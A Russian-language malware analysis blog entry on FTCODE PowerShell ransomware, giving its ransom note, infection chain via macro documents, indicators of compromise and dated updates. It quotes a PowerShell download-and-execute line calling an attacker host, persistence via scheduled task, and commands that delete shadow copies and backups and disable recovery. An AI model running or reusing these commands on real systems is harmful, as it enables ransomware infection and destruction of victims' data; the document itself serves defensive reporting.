FTCODE Ransomware
FTCode Ransomware
PowerShell Locker 2019 Ransomware
(шифровальщик-вымогатель) (первоисточник)
Translation into English
Этот крипто-вымогатель шифрует данные пользователей с помощью AES-256 (в режиме CBC) + RSA-1024, а затем требует выкуп в $500 (0.06 BTC), чтобы вернуть файлы. Оригинальное название: в записке не указано. На файле написано: нет данных.
Обнаружения:
DrWeb -> W97M.Siggen.1152, Trojan.Siggen8.50878
BitDefender -> Undetected, W97M.Downloader.INK, VB:Trojan.VBS.Downloader.AIR
ALYac -> Trojan.Ransom.Powershell
Avira (no cloud) -> TR/Agent.gillq, TR/Dldr.Script.pskrh
Symantec -> W97M.Downloader, Downloader, JS.Downloader
Microsoft -> Trojan:Win32/Vigorf.A, TrojanDownloader:O97M/FTCdedoc.A!M
ESET-NOD32 -> PowerShell/Filecoder.V, GenScript.GKP
Kaspersky -> HEUR:Trojan.Script.Generic, Trojan.Gen.MBT, Trojan-Downloader.VBS.Agent.cxu
TrendMicro -> Trojan.W97M.POWLOAD.THJAEAI, Ransom.VBS.BXCODE.A
Kaspersky -> HEUR:Trojan.Script.Generic, Trojan.Gen.MBT, Trojan-Downloader.VBS.Agent.cxu
TrendMicro -> Trojan.W97M.POWLOAD.THJAEAI, Ransom.VBS.BXCODE.A
© Генеалогия: PowerShell Locker 2013 > PowerShell Locker 2015 > PowerWare > FTCODE
Изображение — логотип статьи
К зашифрованным файлам добавляется расширение: .FTCODE
Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. Активность этого крипто-вымогателя пришлась на конец сентября - начало октября 2019 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.
Записка с требованием выкупа называется: READ_ME_NOW.htm
Содержание записки о выкупе:
All your files was encrypted!
Yes, You can Decrypt Files Encrypted!!! our price 500 USD
Your personal ID: b55718ca-d726-475c-8bba-52fdb5f18***
1. Download Tor browser - https://www.torproject.org/download/
2. Install Tor browser
3. Open Tor Browser
4. Open link in TOR browser: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18***
5. Follow the instructions on this page
***** Warning*****
Do not rename files
Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party software harms them)
As evidence, we can for free back one file
Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.
Перевод записки на русский язык:
Все ваши файлы были зашифрованы!
Да, вы можете расшифровать файлы в зашифрованном виде !!! наша цена 500 долларов
Ваш персональный ID: b55718ca-d726-475c-8bba-52fdb5f18***
1. Скачайте Tor браузер - https://www.torproject.org/download/
2. Установите Tor браузер
3. Откройте Tor браузер
4. Откройте ссылку в Tor браузере: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18***
5. Следуйте инструкциям на этой странице
***** Предупреждение *****
Не переименовывать файлы
Не пытаться создавать резервные копии своих данных с помощью сторонних программ, это может привести к необратимой потере данных (если вы нам не верите и все еще пытаетесь сделать копии всех файлов, чтобы мы могли помочь вам, сторонние программы навредят им)
В качестве доказательства мы можем бесплатно вернуть один файл
Декодеры других пользователей не подходят для резервного копирования ваших файлов - ключ шифрования создается на вашем компьютере при запуске программы - он уникален.
Скриншоты Tor-сайта вымогателей:
По истечении заданного количества дней, если выкуп не выплачивается, то сумма выкупа увеличивается:
первые 3 дня - $500
3-5 дней - $2500
5-10 дней - $5000
10-30 дней - $25000
Есть кнопка для удаления приватного ключа.
Технические детали
Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, вредоносной рекламы, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.
Метод распространения с помощью email-спама и вредоносного email-вложения и запуска описан в статье Certego. Вот краткая часть в переводе на русский язык:
Адресат получает email со ссылкой на поддельный счет с вложенным документом под названием "Fattura-2019-951692.doc". Для просмотра "защищенного" содержимого требуется включить макросы. После включения макросов запускается следующий процесс Powershell:
powershell iex ((New-Object Net.WebClient).DownloadString('xxxp://home.southerntransitions.net/?need=9f5b9ee&vid=dpec2&81038'));
В результате чего загружается фрагмент Powershell-кода, который запускается с помощью команды "Invoke-Expression" ("iex"). Обратите внимание, функция "DownloadString" сохраняет результат запроса только в памяти, чтобы избежать обнаружения антивирусами.
Новый код Powershell - это FTCODE . При выполнении он выполняет следующий запрос GET:
xxxp://home.southerntransitions[.]net/?need=6ff4040&vid=dpec2&
Он нужен, что загрузить файл сценария Visual Basic и сохранить его в C:\Users\Public\Libraries\WindowsIndexingService.vbs
Этот вариант JasperLoader, простой бэкдор, который может загружать дополнительные необходимые данные.
Затем он пытается создать ярлык "WindowsIndexingService.lnk" в папке автозапуска пользователя, который запускает JasperLoader. Для закрепления в системе и запуска после перезагрузки создается запланированная задача "WindowsApplicationService", ссылающаяся на этот ярлык.
Нужно всегда использовать Актуальную антивирусную защиту!!!Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1.
➤ Использует WindowsPowerShell и WindowsIndexingService.vbs, в очередной раз подтверждая их вредоносность для ОС Windows.
➤ Используется Gootkit, который способен похищать из браузеров историю посещений, пароли и файлы cookie, может делать снимки экрана и записывать все, что пользователи вводят внутри веб-форм (пароли, данные банковских карт). Кроме этого Gootkit собирает всю возможную информацию о зараженном хосте и подключенном нему оборудовании.
➤ Завершает работу, если присутствует файл %PUBLIC%\OracleKit\w00log03.tmp
Удаляет теневые копии файлов, отключает функции восстановления и исправления Windows на этапе загрузки командами:
schtasks.exe /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 14 /du 23:59 /TR %PUBLIC%\Libraries\WindowsIndexingService.vbs
cmd.exe /c bcdedit /set hacebzb bootstatuspolicy ignoreallfailures
bcdedit.exe bcdedit /set hacebzb bootstatuspolicy ignoreallfailures
cmd.exe /c bcdedit /set hacebzb recoveryenabled no
bcdedit.exe bcdedit /set hacebzb recoveryenabled no
cmd.exe /c wbadmin delete catalog -quiet
wbadmin.exe wbadmin delete catalog -quiet
cmd.exe /c wbadmin delete systemstatebackup
wbadmin.exe wbadmin delete systemstatebackup
cmd.exe /c wbadmin delete backup
wbadmin.exe wbadmin delete backup
cmd.exe /c vssadmin delete shadows /all /quiet
vssadmin.exe vssadmin delete shadows /all /quiet
.3fr, .7z, .accdb, .ai, .apk, .arch00, .arw, .asset, .avi, .bar, .bay, .bc6, .bc7, .big, .bik, .bkf, .bkp, .blob, .bsa, .cas, .cdr, .cer, .cfr, .cr2, .crt, .crw, .css, .csv, .d3dbsp, .das, .dazip, .db0, .dba, .dbf, .dcr, .der, .desc, .dmp, .dng, .doc, .docm, .docx, .dwg, .dxg, .epk, .eps, .erf, .esm, .ff, .flv, .forge, .fos, .fpk, .fsh, .gdb, .gho, .hkdb, .hkx, .hplg, .hvpl, .ibank, .icxs, .indd, .itdb, .itl, .itm, .iwd, .iwi, .jpe, .jpeg, .jpg, .js, .kdb, .kdc, .kf, .layout, .lbf, .litemod, .lrf, .ltx, .lvl, .m2, .m3u, .m4a, .map, .mcmeta, .mdb, .mdbackup, .mddata, .mdf, .mef, .menu, .mlx, .mov, .mp4, .mpqge, .mrwref, .ncf, .nrw, .ntl, .odb, .odc, .odm, .odp, .ods, .odt, .orf, .p12, .p7b, .p7c, .pak, .pdd, .pdf, .pef, .pem, .pfx, .pkpass, .png, .ppt, .pptm, .pptx, .psd, .psk, .pst, .ptx, .py, .qdf, .qic, .r3d, .raf, .rar, .raw, .rb, .re4, .rgss3a, .rim, .rofl, .rtf, .rw2, .rwl, .sav, .sb, .sid, .sidd, .sidn, .sie, .sis, .slm, .snx, .sql, .sr2, .srf, .srw, .sum, .svg, .syncdb, .t12, .t13, .tax, .tor, .txt, .upk, .vcf, .vdf, .vfs0, .vpk, .vpp_pc, .vtf, .w3x, .wb2, .wma, .wmo, .wmv, .wotreplay, .wpd, .wps, .x3f, .xf, .xlk, .xls, .xlsb, .xlsm, .xlsx, .xxx, .zip, .ztmp (186 расширений).
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, файлы wallet, архивы и пр.
Файлы, связанные с этим Ransomware:
Fattura-2019-951692.doc
READ_ME_NOW.htm
AFX50058.tmp
w00log03.tmp - специальный файл
powershell.exe
<random>.exe - случайное название вредоносного файла
Scan_New_Folder-816663234378244557295027251718767477098569059779.vbs
Файлы проектов:
wscript.pdb, powershell.pdb
➤ В коде есть фраза "BXCODE hack your system".
Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->
Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.
Сетевые подключения и связи:
Tor-URL: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/
URL: home.hopedaybook.com
connect.theshotboard.org
Email: -
BTC: 1ENTEb7MbYfuvUYeTX8foCUPqUnQUWGZsN
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.
Результаты анализов:
Ⓗ Hybrid analysis >>
𝚺 VirusTotal analysis >> VT>>
🐞 Intezer analysis >>
ᕒ ANY.RUN analysis >> AR>>
ⴵ VMRay analysis >>
Ⓥ VirusBay samples >>
⨇ MalShare samples >>
👽 AlienVault analysis >>
🔃 CAPE Sandbox analysis >>
⟲ JOE Sandbox analysis >>
Степень распространённости: средняя.
Подробные сведения собираются регулярно. Присылайте образцы.
=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===
=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===
Обновление от 1 октября 2019:
Пост в Твиттере >>
Пост в Твиттере >>
Расширение: .FTCODE
Записка: READ_ME_NOW.htm
Tor-URL: xxxx://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=b55718ca-d726-475c-8bba-52fdb5f18ede
URL: xxxx://home.southerntransitions.net/
xxxx://connect.southerntransitions.com/
Файлы: powershell.exe, Fattura-2019-951692.doc
Мьютексы: CLR_PerfMon_WrapMutex, CLR_CASOFF_MUTEX и другие, см. результаты VT.
Результаты анализов: VT + HA + AR
Обновление от 9-11 октября 2019:
Пост в Твиттере >>
Расширение: .<random>
Записка: READ_ME_NOW.htm
URL: xxxx://archive.org
xxxx://agency.heritage-insuranceagency.com
Файлы: powershell.exe, WindowsIndexingService.vbs, myvtfile.exe
Результаты анализов: VT + AR
Пост в Твиттере >>
Расширение: .<random> или .<random{6}>
Примеры: .509a49, .21f219, 13d419
Записка: READ_ME_NOW.htm
URL: xxxx://jes.dhinsuranceservices.com/
URL: xxxx://jes.whisperinghillequestriancenter.com
Файл MS Word: Nuovo_documento_52.doc и с другими номерами
Результаты анализов: VT + HA + AR / VT / VT + HA + VMR
All your files was encrypted!
Yes, You can Decrypt Files Encrypted!!!
Your personal ID: fbe8dd2b-9f8e-4753-b196-76554809b1f7
1. Download Tor browser - https://www.torproject.org/download/
2. Install Tor browser
3. Open Tor Browser
4. Open link in TOR browser: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=fbe8dd2b-9f8e-4753-b196-76554809b1f7
5. Follow the instructions on this page
***** Warning*****
Do not rename files
Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party s oftware harms them)
As evidence, we can for free back one file
Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.
Обновление от 30 октября 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
Результаты анализов: VT + AR
URL: xxxx://static.nexilia.it
xxxx://mobi.confessyoursins.mobi
Обновление от 1 ноября 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
Результаты анализов: VT + AR
Обновление от 7 ноября 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
URL: xxxp://dbi.shadysidechurch.com/
Пост в Твиттере >>
Обновление от 10 декабря 2019:
Пост в Твиттере >>
Записка: READ_ME_NOW.htm
Файлы: ScanDocumento__11725497dfc376f565dc41df11738bdaff.vbs
Результаты анализов: VT + AR
Обновление от 11 декабря 2019:
Топик на форуме >>
Расширение: .<random> или .<random{6}>
Записка: READ_ME_NOW.htm
Обновление от 20 января 2020:
FTCode теперь собирает учетные данные из браузеров (Internet Explorer, Mozilla Firefox, Google Chrome) и email-клиентов (Mozilla Thunderbird, Microsoft Outlook). Способы доступа отличаются: а) в случае с Internet Explorer и Microsoft Outlook, FTCode получает прямой доступ к ключам реестра; б) в случае с Mozilla Firefox, Mozilla Thunderbird и Google Chrome FTCode проникает в папки, где эти приложения хранят учетные данные.
После сбора информации FTCode отправляет её своим операторам, используя запрос POST, отправленный на его командно-контрольный сервер (C&C), а имена пользователей и пароли будут закодированы с использованием схемы кодирования Base64.
Подробнее в статье на сайте BleepingComputer >>
=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===
Read to links: Tweet on Twitter + Tweet + Tweet + myTweet ID Ransomware (ID as FTCode) Write-up, Topic of Support Earlier tweets I did not know about: Tw, Tw
Added later: Write-up BleepingComputer (October 3, 2019) Write-up Certego (October 2, 2019) *
- Видеообзор от CyberSecurity GrujaRS
Thanks: GrujaRS, Michael Gillespie, Marco Bompani, Matteo Lodi Andrew Ivanov (author) Wojciech S., TG Soft, Certego, Lawrence Abrams to the victims who sent the samples
© Amigo-A (Andrew Ivanov): All blog articles.
